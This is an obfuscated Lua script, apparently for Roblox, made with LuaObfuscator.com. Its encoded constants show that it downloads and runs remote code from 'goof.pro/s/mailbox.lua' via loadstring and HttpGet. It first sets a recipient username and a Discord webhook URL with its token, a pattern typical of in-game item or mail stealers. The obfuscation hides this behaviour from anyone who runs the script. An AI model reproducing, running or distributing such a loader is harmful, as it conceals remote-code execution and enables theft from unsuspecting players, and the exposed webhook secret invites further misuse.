--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v82=(v31/((5 -3)^(v32-(2 -(878 -(282 + 595))))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v82-(v82%1) ;else local v83=568 -(367 + (1838 -(1523 + 114))) ;local v84;while true do if (v83==(0 + 0)) then v84=(929 -((304 -90) + 713))^(v32-1) ;return (((v31%(v84 + v84))>=v84) and 1) or (0 + 0) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (1068 -(68 + 978 + 19)) );v19=v19 + (1274 -(226 + 232 + 812)) ;return (v37 * ((73055731 -(892 + 65)) -56277558)) + (v36 * 65536) + (v35 * (373 -(32 + 85))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=241 -(187 + 54) ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v38~=3) then else v45=nil;v46=nil;v38=4 + 0 ;end if (v38~=(780 -(162 + 618))) then else v39=0 -0 ;v40=nil;v38=1;end if (v38~=(1 + 0)) then else v41=nil;v42=nil;v38=2;end if (v38~=(1713 -(71 + 1638))) then else while true do if (1==v39) then local v98=0 -0 ;while true do if (v98==(0 + 0)) then v42=nil;v43=nil;v98=1;end if (v98~=1) then else v39=2;break;end end end if (v39~=(9 -7)) then else local v99=0 + 0 ;while true do if (v99==(1 -0)) then v39=1 + 2 ;break;end if (v99==(1636 -(1373 + 263))) then v44=nil;v45=nil;v99=1001 -(451 + 549) ;end end end if (v39==(1 + 2)) then v46=nil;while true do local v101=0 -0 ;while true do if (v101~=(1 -0)) then else if (v40==2) then local v121=0 + 0 ;local v122;while true do if (v121~=(0 + 0)) then else v122=0 -0 ;while true do local v153=0 -0 ;while true do if (v153==0) then if ((0 + 0)==v122) then local v163=0;while true do if (v163~=(1130 -(87 + 1043))) then else for v164=449 -(10 + 438) ,v24() do local v165=0;local v166;while true do if (v165==(0 + 0)) then v166=v22();if (v21(v166,1 + 0 ,561 -(306 + 254) )~=0) then else local v169=0 + 0 ;local v170;local v171;local v172;while true do if (v169==(0 -0)) then local v173=0;while true do if (v173~=(0 + 0)) then else v170=v21(v166,1182 -(1123 + 57) ,1470 -(899 + 568) );v171=v21(v166,4 + 0 ,260 -(163 + 91) );v173=1931 -(1869 + 61) ;end if ((1 + 0)~=v173) then else v169=2 -1 ;break;end end end if (v169~=3) then else if (v21(v171,3,3)==(3 -2)) then v172[5 -1 ]=v46[v172[1 + 3 ]];end v41[v164]=v172;break;end if (2==v169) then if (v21(v171,1 -0 ,1 + 0 )~=(1475 -(1329 + 145))) then else v172[973 -(140 + 831) ]=v46[v172[813 -(569 + 242) ]];end if (v21(v171,1852 -(1409 + 441) ,720 -(15 + 703) )~=(1 + 0)) then else v172[441 -(262 + 176) ]=v46[v172[3]];end v169=3;end if (v169==(1722 -(345 + 1376))) then local v175=1251 -(721 + 530) ;while true do if (v175~=(689 -(198 + 490))) then else v169=2;break;end if (v175~=(1271 -(945 + 326))) then else local v182=0 -0 ;while true do if (v182~=1) then else v175=1;break;end if (v182==0) then v172={v23(),v23(),nil,nil};if (v170==0) then local v183=700 -(271 + 429) ;local v184;local v185;while true do if (v183~=(1 + 0)) then else while true do if (v184==(1500 -(1408 + 92))) then v185=0;while true do if (v185~=0) then else v172[1089 -(461 + 625) ]=v23();v172[4]=v23();break;end end break;end end break;end if (v183==(1288 -(993 + 295))) then local v187=0 + 0 ;while true do if ((1207 -(696 + 510))==v187) then v183=1 -0 ;break;end if (v187~=(1262 -(1091 + 171))) then else v184=0;v185=nil;v187=1 + 0 ;end end end end elseif (v170==(3 -2)) then v172[1 + 2 ]=v24();elseif (v170==(6 -4)) then v172[377 -(123 + 251) ]=v24() -((9 -7)^(714 -(208 + 490))) ;elseif (v170==3) then local v189=0;local v190;local v191;while true do if (v189==0) then v190=1769 -(1749 + 20) ;v191=nil;v189=1;end if (v189~=(1 + 0)) then else while true do if (v190==(0 + 0)) then v191=0;while true do if (v191~=(836 -(660 + 176))) then else v172[3]=v24() -((1 + 1)^(218 -(14 + 188))) ;v172[1326 -(1249 + 73) ]=v23();break;end end break;end end break;end end end v182=1 + 0 ;end end end end end end end break;end end end for v167=676 -(534 + 141) ,v24() do v42[v167-(1 + 0) ]=v29();end v163=2 -1 ;end if (v163==(1901 -(106 + 1794))) then v122=1 + 0 ;break;end end end if (v122~=1) then else return v44;end break;end end end break;end end end break;end if (v101==0) then if (v40==(0 + 0)) then local v123=0 + 0 ;while true do if (v123==(1 -0)) then v43={};v44={v41,v42,nil,v43};v123=2 + 0 ;end if (0==v123) then v41={};v42={};v123=1 + 0 ;end if (v123~=(398 -(115 + 281))) then else v40=2 -1 ;break;end end end if (v40==(2 -1)) then v45=v24();v46={};for v128=1 + 0 ,v45 do local v129=0;local v130;local v131;local v132;while true do if (v129~=0) then else v130=0 -0 ;v131=nil;v129=3 -2 ;end if (v129==(868 -(550 + 317))) then v132=nil;while true do if (v130==(1 -0)) then if (v131==(1 -0)) then v132=v22()~=(0 -0) ;elseif (v131==2) then v132=v25();elseif (v131~=3) then else v132=v26();end v46[v128]=v132;break;end if (v130~=(285 -(134 + 151))) then else local v162=1665 -(970 + 695) ;while true do if (v162==1) then v130=1;break;end if (v162~=(0 + 0)) then else v131=v22();v132=nil;v162=1;end end end end break;end end end v44[5 -2 ]=v22();v40=1992 -(582 + 1408) ;end v101=1;end end end break;end if (0==v39) then local v100=0 -0 ;while true do if (v100~=0) then else v40=0 -0 ;v41=nil;v100=3 -2 ;end if ((1 -0)~=v100) then else v39=1;break;end end end end break;end if (v38==(1826 -(1195 + 629))) then v43=nil;v44=nil;v38=3 -0 ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=v24();local v48=v24();local v49=1;local v50=(v21(v48,851 -(20 + 830) ,66 -46 ) * ((2 + 0)^(5 + 27))) + v47 ;local v51=v21(v48,21,62 -31 );local v52=((v21(v48,97 -(30 + 35) )==1) and  -(1 + 0)) or 1 ;if (v51==(1257 -(815 + 228 + 214))) then if (v50==(0 -0)) then return v52 * (1212 -(323 + 889)) ;else local v89=0 -0 ;while true do if (0==v89) then v51=1;v49=580 -(361 + (345 -(116 + 10))) ;break;end end end elseif (v51==(2367 -(4 + 49 + 267))) then return ((v50==(0 + 0)) and (v52 * ((414 -(15 + 398))/(982 -(18 + 964))))) or (v52 * NaN) ;end return v8(v52,v51-(3850 -2827) ) * (v49 + (v50/((2 + 0)^(33 + 19)))) ;end v26=nil;function v26(v53)local v54;if  not v53 then v53=v24();if (v53==(738 -(542 + 196))) then return "";end end v54=v3(v16,v19,(v19 + v53) -(1 -0) );v19=v19 + v53 ;local v55={};for v66=1 + 0 , #v54 do v55[v66]=v2(v1(v3(v54,v66,v66)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=v1(v16,v19,v19);v19=v19 + 1 ;return v56;end v23=nil;function v23()local v57,v58=v1(v16,v19,v19 + 2 + 0 );v19=v19 + 1 + 1 ;return (v58 * 256) + v57 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v59)if (v1(v59,2)==79) then local v85=0;while true do if (v85==0) then v20=v0(v3(v59,1,1));return "";end end else local v86=v2(v0(v59,16));if v20 then local v90=0;local v91;while true do if (v90==1) then return v91;end if (v90==0) then v91=v5(v86,v20);v20=nil;v90=1;end end else return v86;end end end);v18=1;end if (v18==7) then function v30(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v87=0,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 ];else v78[v87]=v75[v87 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v88=0;while true do if (v88==1) then if (v81<=5) then if (v81<=2) then if (v81<=0) then v78[v80[2]]=v80[3]~=0 ;elseif (v81==1) then do return;end else v78[v80[2]]();end elseif (v81<=3) then local v103;local v104,v105;local v106;local v107;v78[v80[2]]=v62[v80[3]];v72=v72 + 1 ;v80=v68[v72];v107=v80[2];v106=v78[v80[3]];v78[v107 + 1 ]=v106;v78[v107]=v106[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3]~=0 ;v72=v72 + 1 ;v80=v68[v72];v107=v80[2];v104,v105=v71(v78[v107](v13(v78,v107 + 1 ,v80[3])));v73=(v105 + v107) -1 ;v103=0;for v125=v107,v73 do v103=v103 + 1 ;v78[v125]=v104[v103];end v72=v72 + 1 ;v80=v68[v72];v107=v80[2];v78[v107]=v78[v107](v13(v78,v107 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v80=v68[v72];v72=v80[3];elseif (v81>4) then local v133=0;local v134;local v135;while true do if (v133==0) then v134=v80[2];v135=v78[v80[3]];v133=1;end if (v133==1) then v78[v134 + 1 ]=v135;v78[v134]=v135[v80[4]];break;end end else local v136=0;local v137;while true do if (v136==0) then v137=v80[2];v78[v137]=v78[v137](v13(v78,v137 + 1 ,v73));break;end end end elseif (v81<=8) then if (v81<=6) then v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v72=v80[3];elseif (v81==7) then local v138=v80[2];local v139,v140=v71(v78[v138](v13(v78,v138 + 1 ,v80[3])));v73=(v140 + v138) -1 ;local v141=0;for v149=v138,v73 do v141=v141 + 1 ;v78[v149]=v139[v141];end else v72=v80[3];end elseif (v81<=10) then if (v81>9) then v78[v80[2]]=v80[3];else v62[v80[3]]=v78[v80[2]];end elseif (v81>11) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else v78[v80[2]]=v62[v80[3]];end v72=v72 + 1 ;break;end if (v88==0) then v80=v68[v72];v81=v80[1];v88=1;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F672O6F662E70726F2F732F6D61696C626F782E6C756103083O00557365724E616D65030B3O006C756B6974615F3033303103073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3135333937393631302O372O3834353138352F4130563735746E75466F4C6A315F74434A592O2D464C31447163786D6A2O35542D6B39702O6D4235565A6D35745857626E356A795A782D76696A54785053774942442D75001D3O00120A3O00013O00260C3O000C000100020004083O000C000100120B000100033O001203000200043O00202O00020002000500122O000400066O000500016O000200056O00013O00024O00010001000100044O001C000100260C3O0001000100010004083O0001000100120A000100013O00260C00010013000100020004083O0013000100120A3O00023O0004083O0001000100260C0001000F000100010004083O000F000100120A000200083O001206000200073O00122O0002000A3O00122O000200093O00122O000100023O00044O000F00010004083O000100012O00013O00017O00",v9(),...);
